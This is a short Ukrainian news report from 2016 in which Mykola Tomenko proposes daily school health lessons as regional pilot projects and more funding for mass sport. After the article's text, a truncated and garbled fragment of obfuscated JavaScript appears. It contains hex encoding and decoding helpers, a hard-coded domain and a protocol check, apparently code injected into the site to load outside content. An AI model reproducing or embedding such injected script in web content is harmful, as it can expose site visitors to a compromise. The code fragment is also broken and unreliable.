Микола Томенко: Щоденні уроки здоров’я варто зробити бодай пілотним проектом

5 Січня 2016 11:05
ponomarenkivska.edu.kh.ua

ponomarenkivska.edu.kh.ua

Засновник Фонду «Рідна країна», віце-президент НОКу Микола Томенко звернув увагу на відсутність в державі реальної програми пропагування здорового способу життя.

“Натомість Фонд «Рідна країна» продовжить низку програм в рамках проекту «Здоровим і спортивним бути модно», – повідомив М. Томенко. – Мова йде про продовження реконструкції спортивних майданчиків в школах та мікрорайонах, визначення кращих спортивних класів, спортивних сіл та вчителів фізкультури”.

Микола Томенко наголосив також на необхідності зміни змісту занять з фізичної культури у вишах та школах. Зокрема, на його думку, варто було би збільшити оздоровчий характер уроків, а у молодших класах запровадити своєрідні уроки здоров’я у щоденному форматі.

«Такий підхід можна було би спробувати у кількох регіонах як пілотні проекти. Також необхідно застерегти фінансування дитячих спрортивних шкіл та загалом фінансування масового спорту», – вважає М. Томенко.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "zt.ridna.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e